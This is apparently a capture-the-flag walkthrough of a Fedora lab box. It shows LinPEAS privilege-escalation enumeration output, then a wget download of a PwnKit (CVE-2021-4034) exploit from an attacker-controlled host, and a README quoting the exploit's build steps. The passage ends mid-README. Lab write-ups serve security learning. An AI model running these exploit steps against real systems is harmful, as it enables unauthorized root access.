passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /var/lib/sss/mc/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-------. 1 magellan magellan 1200 May 21 22:04 /home/magellan/.gnupg/trustdb.gpg
-rw-r--r--. 1 root root 2899 Aug 24 2020 /usr/share/gnupg/distsigkey.gpg
drwx------. 3 magellan magellan 69 May 21 23:19 /home/magellan/.gnupg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r--. 1 root root 761 Jul 25 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing Samba Files (limit 70)
-rw-r--r--. 1 root root 853 Apr 29 2021 /etc/samba/smb.conf
browseable = No
read only = No
create mask = 0600
browseable = No
create mask = 0664
directory mask = 0775
╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r--. 1 root root 826 Jul 25 2020 /usr/share/bash-completion/completions/bind
-rw-r--r--. 1 root root 826 Jul 25 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Windows Files (limit 70)
-rw-r--r--. 1 root root 475 Jan 26 2021 /usr/lib/firewalld/services/vnc-server.xml
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r--. 1 root root 492 Jan 26 2021 /etc/skel/.bashrc
-rw-r--r--. 1 magellan magellan 492 Jan 26 2021 /home/magellan/.bashrc
-rw-------. 1 magellan magellan 36 May 21 2021 /home/magellan/.lesshst
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x. 1 root root 73K Apr 7 2021 /usr/bin/chage
-rwsr-xr-x. 1 root root 77K Apr 7 2021 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 42K Apr 7 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 49K Feb 12 2021 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 32K Jan 28 2021 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x. 1 root root 58K Feb 12 2021 /usr/bin/su
-rwsr-xr-x. 1 root root 37K Feb 12 2021 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 53K Mar 29 2021 /usr/bin/crontab
---s--x--x. 1 root root 182K Jan 26 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 32K Jan 30 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rws--x--x. 1 root root 33K Feb 12 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rws--x--x. 1 root root 25K Feb 12 2021 /usr/bin/chsh
-rwsr-xr-x. 1 root root 57K Jan 26 2021 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x. 1 root root 16K Apr 12 2021 /usr/sbin/grub2-set-bootflag (Unknown SUID binary!)
-rwsr-xr-x. 1 root root 16K Apr 20 2021 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 24K Apr 20 2021 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 115K Apr 10 2021 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 24K Jan 28 2021 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-x---. 1 root cockpit-wsinstance 53K May 16 2021 /usr/libexec/cockpit-session (Unknown SUID binary!)
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x. 1 root tty 25K Feb 12 2021 /usr/bin/write
-rwx--s--x. 1 root slocate 41K Jan 27 2021 /usr/bin/locate
-rwx--s--x. 1 root utmp 16K Jan 27 2021 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 310K Mar 9 2021 /usr/libexec/openssh/ssh-keysign
-rwxr-sr-x. 1 abrt abrt 16K May 25 2021 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include ld.so.conf.d/*.conf
ld.so.conf.d
ld.so.conf.d/*
cat: 'ld.so.conf.d/*': No such file or directory
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/mtr-packet cap_net_raw=ep
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 100
drwxr-xr-x. 2 root root 4096 May 19 2021 .
drwxr-xr-x. 102 root root 8192 Jun 1 2021 ..
-rw-r--r--. 1 root root 726 Jan 26 2021 bash_completion.sh
-rw-r--r--. 1 root root 196 Jan 30 2021 colorgrep.csh
-rw-r--r--. 1 root root 201 Jan 30 2021 colorgrep.sh
-rw-r--r--. 1 root root 1763 May 17 2021 colorls.csh
-rw-r--r--. 1 root root 1606 May 17 2021 colorls.sh
-rw-r--r--. 1 root root 162 Jan 29 2021 colorxzgrep.csh
-rw-r--r--. 1 root root 183 Jan 29 2021 colorxzgrep.sh
-rw-r--r--. 1 root root 216 Jan 26 2021 colorzgrep.csh
-rw-r--r--. 1 root root 220 Jan 26 2021 colorzgrep.sh
-rw-r--r--. 1 root root 80 Jan 29 2021 csh.local
-rw-r--r--. 1 root root 1107 Aug 28 2019 gawk.csh
-rw-r--r--. 1 root root 757 Aug 28 2019 gawk.sh
-rw-r--r--. 1 root root 3424 Jun 23 2020 lang.csh
-rw-r--r--. 1 root root 3187 Jun 23 2020 lang.sh
-rw-r--r--. 1 root root 500 May 6 2021 less.csh
-rw-r--r--. 1 root root 253 May 6 2021 less.sh
-rw-r--r--. 1 root root 122 Mar 3 2021 nano-default-editor.csh
-rw-r--r--. 1 root root 120 Mar 3 2021 nano-default-editor.sh
-rw-r--r--. 1 root root 81 Jan 29 2021 sh.local
-rw-r--r--. 1 root root 120 May 4 2021 which2.csh
-rw-r--r--. 1 root root 478 May 4 2021 which2.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/magellan
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/inaccessible
/run/user/1001/systemd/inaccessible/dir
/run/user/1001/systemd/inaccessible/reg
/run/user/1001/systemd/units
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
/var/spool/mail/magellan
/var/tmp
/var/tmp/dnf-magellan-eb3dtvaj
/var/tmp/dnf-magellan-eb3dtvaj/dnf.librepo.log
/var/tmp/dnf-magellan-eb3dtvaj/dnf.log
/var/tmp/dnf-magellan-eb3dtvaj/dnf.rpm.log
/var/tmp/dnf-magellan-eb3dtvaj/expired_repos.json
/var/tmp/dnf-magellan-eb3dtvaj/hawkey.log
#)You_can_write_even_more_files_inside_last_directory
/var/tmp/dnf-magellan-eb3dtvaj/locks/be5546dbcdfa46e5bfb46559a17e7f02cb64a548
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/lesspipe.sh
/usr/bin/source-highlight-esc.sh
/usr/bin/src-hilite-lesspipe.sh
/usr/bin/setup-nsssysinit.sh
/usr/bin/venus_monitoring_web.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2021-05-21+11:05:56.8903282290 /usr/bin/venus_monitoring_web.sh
2021-05-20+21:44:39.5440508960 /home/magellan/venus_monitor_proj/manage.py
2021-05-20+20:39:52.0991252430 /home/magellan/.local/bin/django-admin
2021-05-20+20:39:46.9977700110 /home/magellan/.local/bin/django-admin.py
2021-05-20+20:39:44.1399710940 /home/magellan/.local/bin/sqlformat
2021-05-20+16:12:11.0829938480 /usr/bin/venus_messaging
╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/journal/2650d1dd6c7744ed8c6524d8bd4b8e5b/system.journal
/var/log/journal/2650d1dd6c7744ed8c6524d8bd4b8e5b/user-1001.journal
/var/log/cron
/var/log/messages
/var/log/secure
/var/tmp/dnf-magellan-eb3dtvaj/dnf.log
/var/tmp/dnf-magellan-eb3dtvaj/dnf.librepo.log
/var/tmp/dnf-magellan-eb3dtvaj/dnf.rpm.log
/var/tmp/dnf-magellan-eb3dtvaj/expired_repos.json
/var/tmp/dnf-magellan-eb3dtvaj/hawkey.log
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.18.0
Default mail command: /bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/logrotate.status
ACL support: yes
SELinux support: yes
Writable: /var/tmp/dnf-magellan-eb3dtvaj/dnf.log
Writable: /var/tmp/dnf-magellan-eb3dtvaj/dnf.librepo.log
Writable: /var/tmp/dnf-magellan-eb3dtvaj/dnf.rpm.log
Writable: /home/magellan/venus_monitor_proj/debug.log
╔══════════╣ Files inside /home/magellan (limit 20)
total 876
drwx------. 6 magellan magellan 260 May 21 23:16 .
drwxr-xr-x. 4 root root 35 May 20 2021 ..
lrwxrwxrwx. 1 magellan magellan 9 May 21 2021 .bash_history -> /dev/null
-rw-r--r--. 1 magellan magellan 18 Jan 26 2021 .bash_logout
-rw-r--r--. 1 magellan magellan 141 Jan 26 2021 .bash_profile
-rw-r--r--. 1 magellan magellan 492 Jan 26 2021 .bashrc
drwxrwxr-x. 3 magellan magellan 17 May 20 2021 .cache
drwx------. 3 magellan magellan 69 May 21 23:19 .gnupg
-rw-------. 1 magellan magellan 36 May 21 2021 .lesshst
drwx------. 4 magellan magellan 28 May 20 2021 .local
-rw-------. 1 magellan magellan 42 May 20 2021 .python_history
-rw-rw-r--. 1 magellan magellan 38 May 21 2021 .virc
-rw-rw-r--. 1 magellan magellan 218 May 21 2021 .wget-hsts
-rwxr-xr-x. 1 magellan magellan 862779 May 21 22:00 linpeas.sh
-rw-------. 1 magellan magellan 45 May 21 2021 user_flag.txt
drwxrwxr-x. 4 magellan magellan 109 May 21 2021 venus_monitor_proj
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
13658575 0 -rw-rw---- 1 rpc mail 0 May 19 2021 /var/mail/rpc
12586557 0 -rw-rw---- 1 venus mail 0 May 20 2021 /var/mail/venus
12920963 0 -rw-rw---- 1 magellan mail 0 May 20 2021 /var/mail/magellan
13658575 0 -rw-rw---- 1 rpc mail 0 May 19 2021 /var/spool/mail/rpc
12586557 0 -rw-rw---- 1 venus mail 0 May 20 2021 /var/spool/mail/venus
12920963 0 -rw-rw---- 1 magellan mail 0 May 20 2021 /var/spool/mail/magellan
╔══════════╣ Backup files (limited 100)
-rw-r--r--. 1 root root 2124 May 19 2021 /etc/nsswitch.conf.bak
-rw-r--r--. 1 root root 1222 May 31 2021 /etc/selinux/.config_backup
-rw-r--r--. 1 root root 2376 May 12 2021 /usr/lib/modules/5.11.20-300.fc34.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rw-r--r--. 1 root root 2380 May 28 2021 /usr/lib/modules/5.12.8-300.fc34.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rw-r--r--. 2 root root 1405 Mar 10 2021 /usr/lib/python3.9/site-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-39.opt-1.pyc
-rw-r--r--. 2 root root 1405 Mar 10 2021 /usr/lib/python3.9/site-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-39.pyc
-rw-r--r--. 1 root root 1775 Feb 25 2021 /usr/lib/python3.9/site-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r--. 1 root root 305 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_1.conf
-rw-r--r--. 1 root root 465 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_2.conf
-rw-r--r--. 1 root root 194 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_1.conf
-rw-r--r--. 1 root root 212 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_2.conf
-rw-r--r--. 1 root root 241 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_3.conf
-rw-r--r--. 1 root root 447 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_multi_lw_1.conf
-rw-r--r--. 1 root root 285 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_nsna_ping_1.conf
-rw-r--r--. 1 root root 318 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_tipc.conf
-rw-r--r--. 1 root root 41508 Mar 9 2006 /usr/share/doc/pinfo/ChangeLog.old
-r--r--r--. 1 root root 2747 Feb 22 2021 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r--. 1 root root 1014 Nov 23 2017 /usr/share/augeas/lenses/dist/backuppchosts.aug
-rw-r--r--. 1 root root 94749 May 20 2021 /usr/share/info/dir.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/cert9.db: SQLite 3.x database, last written using SQLite version 0
Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/key4.db: SQLite 3.x database, last written using SQLite version 0
Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /home/magellan/venus_monitor_proj/db.sqlite3: empty
Found /var/lib/dnf/history.sqlite: SQLite 3.x database, last written using SQLite version 3034001
Found /var/lib/rpm/rpmdb.sqlite: SQLite 3.x database, last written using SQLite version 3034001
-> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)
-> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)
-> Extracting tables from /var/lib/dnf/history.sqlite (limit 20)
-> Extracting tables from /var/lib/rpm/rpmdb.sqlite (limit 20)
╔══════════╣ Web files?(output limit)
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--. 1 root root 168 May 12 2021 /boot/.vmlinuz-5.11.20-300.fc34.x86_64.hmac
-rw-r--r--. 1 root root 167 May 28 2021 /boot/.vmlinuz-5.12.8-300.fc34.x86_64.hmac
-rw-r--r--. 1 root root 0 May 21 20:04 /run/initramfs/.need_shutdown
-rw-r--r--. 1 root root 18 Jan 26 2021 /etc/skel/.bash_logout
-rw-r--r--. 1 root root 129 May 28 2021 /etc/selinux/targeted/.policy.sha512
-rw-r--r--. 1 root root 1222 May 31 2021 /etc/selinux/.config_backup
-rw-------. 1 root root 0 May 19 2021 /etc/.pwd.lock
-rw-r--r--. 1 root root 208 May 19 2021 /etc/.updated
-rw-r--r--. 1 root root 0 May 19 2021 /var/lib/rpm/.rpm.lock
-rw-r--r--. 1 root root 0 May 19 2021 /var/cache/abrt-di/.migration-group-add
-rw-r--r--. 1 root root 208 May 19 2021 /var/.updated
-rw-r--r--. 1 root root 168 May 12 2021 /usr/lib/modules/5.11.20-300.fc34.x86_64/.vmlinuz.hmac
-rw-r--r--. 1 root root 167 May 28 2021 /usr/lib/modules/5.12.8-300.fc34.x86_64/.vmlinuz.hmac
-rw-r--r--. 1 root root 65 Jan 26 2021 /usr/lib64/.libgmp.so.10.4.0.hmac
-rw-r--r--. 1 root root 65 Mar 21 2021 /usr/lib64/.libhogweed.so.6.3.hmac
-rw-r--r--. 1 root root 65 Mar 21 2021 /usr/lib64/.libnettle.so.8.3.hmac
-rw-r--r--. 1 root root 65 Apr 28 2021 /usr/lib64/.libgcrypt.so.20.hmac
-rw-r--r--. 1 root root 65 Mar 26 2021 /usr/lib64/.libcrypto.so.1.1.1k.hmac
-rw-r--r--. 1 root root 65 Mar 26 2021 /usr/lib64/.libssl.so.1.1.1k.hmac
-rw-r--r--. 1 root root 65 May 29 2021 /usr/lib64/.libgnutls.so.30.30.0.hmac
-rw-r--r--. 1 root root 42 Feb 18 2021 /usr/share/man/man5/.k5identity.5.gz
-rw-r--r--. 1 root root 40 Jan 26 2021 /usr/share/man/man1/..1.gz
-rw-r--r--. 1 magellan magellan 18 Jan 26 2021 /home/magellan/.bash_logout
-rw-rw-r--. 1 magellan magellan 38 May 21 2021 /home/magellan/.virc
-rw-rw-r--. 1 magellan magellan 218 May 21 2021 /home/magellan/.wget-hsts
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r--. 1 magellan magellan 1955 May 21 23:19 /var/tmp/dnf-magellan-eb3dtvaj/dnf.log
-rw-r--r--. 1 magellan magellan 474 May 21 23:19 /var/tmp/dnf-magellan-eb3dtvaj/dnf.librepo.log
-rw-r--r--. 1 magellan magellan 116 May 21 23:19 /var/tmp/dnf-magellan-eb3dtvaj/dnf.rpm.log
-rw-r--r--. 1 magellan magellan 2 May 21 23:19 /var/tmp/dnf-magellan-eb3dtvaj/expired_repos.json
-rw-r--r--. 1 magellan magellan 120 May 21 23:19 /var/tmp/dnf-magellan-eb3dtvaj/hawkey.log
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/authselect/password-auth
/etc/cockpit/ws-certs.d/0-self-signed.key
/etc/pam.d/password-auth
/etc/trusted-key.key
/etc/unbound/root.key
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/admin/templates/admin/auth/user/change_password.html
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/admin/templates/registration/password_change_done.html
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/admin/templates/registration/password_change_form.html
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/admin/templates/registration/password_reset_complete.html
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/admin/templates/registration/password_reset_confirm.html
#)There are more creds/passwds files in the previous parent folder
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/common-passwords.txt.gz
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/management/commands/__pycache__/changepassword.cpython-39.pyc
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/management/commands/changepassword.py
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/password_validation.py
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/templates/auth/widgets/read_only_password_hash.html
/home/magellan/.local/lib/python3.9/site-packages/django/contrib/auth/templates/registration/password_reset_subject.txt
/home/magellan/.local/lib/python3.9/site-packages/django/forms/jinja2/django/forms/widgets/password.html
/home/magellan/.local/lib/python3.9/site-packages/django/forms/templates/django/forms/widgets/password.html
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/bin/tpm2_activatecredential
/usr/bin/tpm2_makecredential
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/lib64/libsamba-credentials.so.1
/usr/lib64/libsamba-credentials.so.1.0.0
/usr/lib64/samba/libcmdline-credentials-samba4.so
/usr/sbin/grub2-set-password
/usr/sbin/grub2-setpassword
/usr/share/augeas/lenses/dist/jmxpassword.aug
/usr/share/augeas/lenses/dist/postfix_passwordmap.aug
/usr/share/authselect/default/minimal/password-auth
/usr/share/authselect/default/nis/password-auth
/usr/share/authselect/default/sssd/password-auth
/usr/share/authselect/default/winbind/password-auth
/usr/share/doc/openssh/PROTOCOL.key
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man1/tpm2_activatecredential.1.gz
/usr/share/man/man1/tpm2_makecredential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/grub2-set-password.8.gz
/usr/share/man/man8/grub2-setpassword.8.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/var/lib/unbound/root.key
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
[magellan@venus ~]$
This time, it should execute without any issues.
After running “
linpeas.sh”, the tool
will generate output, providing comprehensive information, including SUID
binaries, vulnerabilities, and other relevant data to aid in the privilege
escalation process.
CVE-2021-4034 PwnKit vulnerability
Upon analyzing the LinPEAS output, I discovered that the server is vulnerable to a local privilege escalation vulnerability. For this purpose, we will use the CVE-2021-4034 PwnKit vulnerability.
[+] [CVE-2021-4034] PwnKit
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download the exploit code from the provided link. Use the wget command to download the zip file. Unzip it and change the directory to the unzipped directory.
[magellan@venus ~]$ wget "http://192.168.95.3:8000/CVE-2021-4034-main.zip"
--2024-05-21 23:24:51-- http://192.168.95.3:8000/CVE-2021-4034-main.zip
Connecting to 192.168.95.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6457 (6.3K) [application/zip]
Saving to: ‘CVE-2021-4034-main.zip’
CVE-2021-4034-main.zip 100%[================================================>] 6.31K --.-KB/s in 0s
2024-05-21 23:24:51 (56.1 MB/s) - ‘CVE-2021-4034-main.zip’ saved [6457/6457]
[magellan@venus ~]$ ls -al
total 888
drwx------. 6 magellan magellan 4096 May 21 23:24 .
drwxr-xr-x. 4 root root 35 May 20 2021 ..
lrwxrwxrwx. 1 magellan magellan 9 May 21 2021 .bash_history -> /dev/null
-rw-r--r--. 1 magellan magellan 18 Jan 26 2021 .bash_logout
-rw-r--r--. 1 magellan magellan 141 Jan 26 2021 .bash_profile
-rw-r--r--. 1 magellan magellan 492 Jan 26 2021 .bashrc
drwxrwxr-x. 3 magellan magellan 17 May 20 2021 .cache
drwx------. 3 magellan magellan 69 May 21 23:19 .gnupg
-rw-------. 1 magellan magellan 36 May 21 2021 .lesshst
drwx------. 4 magellan magellan 28 May 20 2021 .local
-rw-------. 1 magellan magellan 42 May 20 2021 .python_history
-rw-rw-r--. 1 magellan magellan 38 May 21 2021 .virc
-rw-rw-r--. 1 magellan magellan 218 May 21 2021 .wget-hsts
-rw-r--r--. 1 magellan magellan 6457 May 22 2024 CVE-2021-4034-main.zip
-rwxr-xr-x. 1 magellan magellan 862779 May 21 22:00 linpeas.sh
-rw-------. 1 magellan magellan 45 May 21 2021 user_flag.txt
drwxrwxr-x. 4 magellan magellan 109 May 21 2021 venus_monitor_proj
[magellan@venus ~]$ unzip CVE-2021-4034-main.zip
Archive: CVE-2021-4034-main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
creating: CVE-2021-4034-main/
inflating: CVE-2021-4034-main/.gitignore
inflating: CVE-2021-4034-main/LICENSE
inflating: CVE-2021-4034-main/Makefile
inflating: CVE-2021-4034-main/README.md
inflating: CVE-2021-4034-main/cve-2021-4034.c
inflating: CVE-2021-4034-main/cve-2021-4034.sh
creating: CVE-2021-4034-main/dry-run/
inflating: CVE-2021-4034-main/dry-run/Makefile
inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
inflating: CVE-2021-4034-main/pwnkit.c
[magellan@venus ~]$ ls -l
total 856
drwxr-xr-x. 3 magellan magellan 150 Jan 30 2022 CVE-2021-4034-main
-rw-r--r--. 1 magellan magellan 6457 May 22 2024 CVE-2021-4034-main.zip
-rwxr-xr-x. 1 magellan magellan 862779 May 21 22:00 linpeas.sh
-rw-------. 1 magellan magellan 45 May 21 2021 user_flag.txt
drwxrwxr-x. 4 magellan magellan 109 May 21 2021 venus_monitor_proj
[magellan@venus ~]$ cd CVE-2021-4034-main/
[magellan@venus CVE-2021-4034-main]$ ls -al
total 32
drwxr-xr-x. 3 magellan magellan 150 Jan 30 2022 .
drwx------. 7 magellan magellan 4096 May 21 23:25 ..
-rw-r--r--. 1 magellan magellan 114 Jan 30 2022 .gitignore
-rw-r--r--. 1 magellan magellan 1071 Jan 30 2022 LICENSE
-rw-r--r--. 1 magellan magellan 469 Jan 30 2022 Makefile
-rw-r--r--. 1 magellan magellan 3419 Jan 30 2022 README.md
-rw-r--r--. 1 magellan magellan 292 Jan 30 2022 cve-2021-4034.c
-rwxr-xr-x. 1 magellan magellan 305 Jan 30 2022 cve-2021-4034.sh
drwxr-xr-x. 2 magellan magellan 77 Jan 30 2022 dry-run
-rw-r--r--. 1 magellan magellan 339 Jan 30 2022 pwnkit.c
[magellan@venus CVE-2021-4034-main]$
To compile and run the exploit, first, we have to take a look at the read me file using the cat command.
[magellan@venus CVE-2021-4034-main]$ cat README.md
# CVE-2021-4034
One day for the polkit privilege escalation exploit
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
## PoC
If the exploit is working you'll get a root shell immediately:
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
